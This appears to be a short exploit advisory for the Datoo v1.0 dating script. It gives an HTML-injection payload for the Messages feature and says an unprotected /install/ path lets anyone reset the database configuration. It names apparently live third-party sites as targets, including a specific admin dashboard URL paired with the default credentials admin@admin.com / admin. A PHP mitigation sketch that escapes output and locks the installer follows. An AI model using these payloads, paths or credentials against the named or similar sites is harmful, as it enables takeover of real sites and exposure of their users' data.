====================================================================================================================================
| # Title : Datoo - Complete Dating Script v1.0 HTML CODE Inject Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : v1.0 |
| # Vendor : http://www.codelist.cc/scripts/232821-datoo-v10-complete-dating-script.html |
| # Dork : http://nelliwinne.net/ |
====================================================================================================================================
poc :
HTML CODE inject :
[+] Dork in Google or another search engine.
[+] Create a new user, log in, go to Messages and paste HTML code.
[+] use payload :
</tr>
<td align="center"><a href="https://packetstormsecurity.com/files/authors/7697"><img src="https://packetstatic.com/img1398360120/ps_logo.png" alt="" width="650" height="120" border="0" /></a>
</tr>
Disconnect the database :
[+] use path : /install/
After adding the path, you are given a page to enter the database configuration.
You can type anything or press install script.
https://wzy.ro/install/
backdoor account :
https://www.lifeisnowbrasil.com.br/admin/dashboard.php
user : admin@admin.com
pass : admin
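Mitigation sketch for the message injection and the reachable /install/ path above, as an added example that is not Datoo's own code. It assumes the script is PHP; the function names and the lock-file path are hypothetical.

```php
<?php
// Added example, not Datoo's code. Function names and the lock path are hypothetical.
declare(strict_types=1);

/** Encode a stored message body for output in an HTML context. */
function render_message(string $body): string
{
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences instead of returning an empty string.
    $safe = htmlspecialchars($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return nl2br($safe, false); // keep line breaks the sender typed
}

/** The installer may run only while no lock file exists. */
function installer_allowed(string $lockFile): bool
{
    return !is_file($lockFile);
}

/** Mark installation as finished so /install/ refuses later requests. */
function lock_installer(string $lockFile): void
{
    file_put_contents($lockFile, date('c'), LOCK_EX);
}

// Constructed sample input: table/link markup of the kind used in the PoC.
$message = '</tr><td align="center"><a href="https://example.invalid/">'
         . '<img src="x.png" alt="" /></a></tr>';
// Angle brackets and quotes come out as entities, so a browser shows text only.
echo render_message($message), PHP_EOL;

$lock = sys_get_temp_dir() . '/datoo_install.lock'; // hypothetical location
if (installer_allowed($lock)) {
    lock_installer($lock);   // first run: installation completes, lock is written
}
if (!installer_allowed($lock)) {
    http_response_code(403); // any later request to /install/ is refused
    echo 'Installer disabled', PHP_EOL;
}
unlink($lock); // remove the demo lock file
```

In a deployment the lock file would live outside the web root, and the shipped admin@admin.com / admin account would be replaced during installation.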
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================